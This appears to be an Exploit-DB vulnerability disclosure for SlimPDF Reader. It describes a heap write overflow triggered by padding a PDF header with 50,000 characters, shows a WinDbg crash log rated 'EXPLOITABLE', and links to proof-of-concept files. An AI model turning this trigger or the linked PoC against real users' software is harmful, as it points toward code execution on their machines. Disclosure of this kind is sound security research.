SlimPDF Reader PoC



EDB-ID: 17274 CVE: N/A OSVDB-ID: 72345
Author: Nicolas Krassas Published: 2011-05-12 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Screenshot
Prev Home Next
Slimpdf Reader from investintech,
http://www.investintech.com/resources/freetools/slimpdfreader/ is prone to
several overflows that can lead to code execution.  The crash below is
triggered by simply adding 50.000 random characters in the header of a pdf
file. Initial bug and directions to exploitation were given from Jason
Kratzer.

PoC at http://www.deventum.com/research/crash_slimpdf.pdf

CommandLine: "C:\Program Files\Investintech.com Inc\SlimPDF Reader\SlimPDF
Reader.exe"

Executable search path is:
ModLoad: 00400000 00776000   SlimPDF Reader.exe
ModLoad: 779c0000 77afd000   ntdll.dll
ModLoad: 76990000 76a64000   C:\Windows\system32\kernel32.dll
ModLoad: 75e10000 75e5a000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 77920000 779c0000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 77870000 7791c000   C:\Windows\system32\msvcrt.dll
ModLoad: 75e70000 75e89000   C:\Windows\SYSTEM32\sechost.dll
ModLoad: 77760000 77801000   C:\Windows\system32\RPCRT4.dll
ModLoad: 76470000 76539000   C:\Windows\system32\USER32.dll
ModLoad: 767e0000 7682e000   C:\Windows\system32\GDI32.dll
ModLoad: 762c0000 762ca000   C:\Windows\system32\LPK.dll
ModLoad: 75f70000 7600d000   C:\Windows\system32\USP10.dll
ModLoad: 75ef0000 75f6b000   C:\Windows\system32\COMDLG32.dll
ModLoad: 75e90000 75ee7000   C:\Windows\system32\SHLWAPI.dll
ModLoad: 74a40000 74bde000
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\COMCTL32.dll
ModLoad: 76a80000 776c9000   C:\Windows\system32\SHELL32.dll
ModLoad: 6cbf0000 6cc41000   C:\Windows\system32\WINSPOOL.DRV
ModLoad: 6ab80000 6ab9c000   C:\Windows\system32\oledlg.dll
ModLoad: 76830000 7698c000   C:\Windows\system32\ole32.dll
ModLoad: 776d0000 7775f000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 76540000 76575000   C:\Windows\system32\WS2_32.dll
ModLoad: 76a70000 76a76000   C:\Windows\system32\NSI.dll
ModLoad: 74730000 748c0000
C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
ModLoad: 76580000 7669a000   C:\Windows\system32\WININET.dll
ModLoad: 75e60000 75e63000   C:\Windows\system32\Normaliz.dll
ModLoad: 76100000 762b6000   C:\Windows\system32\iertutil.dll
ModLoad: 766a0000 767b0000   C:\Windows\system32\urlmon.dll
(9d8.c1c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0012fb0c edx=77a06344 esi=fffffffe
edi=00000000
eip=77a5ebbe esp=0012fb28 ebp=0012fb54 iopl=0         nv up ei pl zr na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00000246
ntdll!LdrVerifyImageMatchesChecksum+0x633:
77a5ebbe cc              int     3
0:000> g
ModLoad: 76010000 7602f000   C:\Windows\system32\IMM32.DLL
ModLoad: 76030000 760fc000   C:\Windows\system32\MSCTF.dll
ModLoad: 748c0000 74900000   C:\Windows\system32\uxtheme.dll
ModLoad: 73650000 7365f000   C:\Windows\system32\inetmib1.dll
ModLoad: 73b90000 73bac000   C:\Windows\system32\IPHLPAPI.DLL
ModLoad: 730d0000 730d7000   C:\Windows\system32\WINNSI.DLL
ModLoad: 6c8d0000 6c8d9000   C:\Windows\system32\snmpapi.dll
ModLoad: 75ab0000 75abc000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 74480000 74493000   C:\Windows\system32\dwmapi.dll
ModLoad: 77810000 77815000   C:\Windows\system32\psapi.dll
ModLoad: 77b00000 77b83000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 6afe0000 6b038000   C:\Program Files\Common Files\microsoft
shared\ink\tiptsf.dll
ModLoad: 74270000 7436b000   C:\Windows\system32\WindowsCodecs.dll
ModLoad: 75a60000 75aab000   C:\Windows\system32\apphelp.dll
ModLoad: 6bdc0000 6bdf1000   C:\Windows\system32\EhStorShell.dll
ModLoad: 762d0000 7646d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75d20000 75d47000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 75d00000 75d12000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 74900000 749f5000   C:\Windows\system32\PROPSYS.dll
ModLoad: 6bd50000 6bdba000   C:\Windows\System32\cscui.dll
ModLoad: 6bd40000 6bd49000   C:\Windows\System32\CSCDLL.dll
ModLoad: 714e0000 714eb000   C:\Windows\system32\CSCAPI.dll
ModLoad: 6bcd0000 6bd3f000   C:\Windows\system32\ntshrui.dll
ModLoad: 757f0000 75809000   C:\Windows\system32\srvcli.dll
ModLoad: 73cf0000 73cfa000   C:\Windows\system32\slc.dll
ModLoad: 74ea0000 74ec1000   C:\Windows\system32\ntmarta.dll
ModLoad: 77820000 77865000   C:\Windows\system32\WLDAP32.dll
ModLoad: 75b60000 75b6b000   C:\Windows\system32\profapi.dll
ModLoad: 755e0000 755f6000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 75380000 753bb000   C:\Windows\system32\rsaenh.dll
ModLoad: 75b20000 75b2e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 66030000 6608c000   C:\Windows\System32\StructuredQuery.dll
ModLoad: 75900000 75908000   C:\Windows\System32\Secur32.dll
ModLoad: 75a40000 75a5a000   C:\Windows\system32\SSPICLI.DLL
ModLoad: 6b450000 6b49e000   C:\Windows\system32\actxprxy.dll
ModLoad: 665e0000 66612000   C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 67620000 67636000   C:\Windows\system32\thumbcache.dll
ModLoad: 6b3f0000 6b41e000   C:\Windows\system32\SHDOCVW.dll
ModLoad: 69f80000 6a8c5000   C:\Windows\system32\ieframe.DLL
ModLoad: 72bb0000 72bec000   C:\Windows\system32\OLEACC.dll
ModLoad: 73440000 734df000   C:\Windows\system32\SearchFolder.dll
ModLoad: 6a9e0000 6ab78000   C:\Windows\system32\NetworkExplorer.dll
ModLoad: 6b4d0000 6b4d9000   C:\Windows\system32\LINKINFO.dll
ModLoad: 74120000 7412f000   C:\Windows\system32\samcli.dll
ModLoad: 74a00000 74a12000   C:\Windows\system32\SAMLIB.dll
ModLoad: 74140000 74149000   C:\Windows\system32\netutils.dll
(9d8.c1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01d32eb0 ebx=01d1fdc8 ecx=01d2fd68 edx=00000150 esi=01d32e08
edi=01d2fde8
eip=004419c4 esp=0012ebcc ebp=0012ebe8 iopl=0         nv up ei pl zr na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010246
*** WARNING: Unable to verify checksum for SlimPDF Reader.exe
*** ERROR: Module load completed but symbols could not be loaded for SlimPDF
Reader.exe
SlimPDF_Reader+0x419c4:
004419c4 880c02          mov     byte ptr [edx+eax],cl
ds:0023:01d33000=??
0:000> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
SlimPDF_Reader+0x00000000000419c4 (Hash=0x566e1f14.0x18331e13)

User mode write access violations that are not near NULL are exploitable.

POC: http://www.exploit-db.com/sploits/17274.poc.tar.gz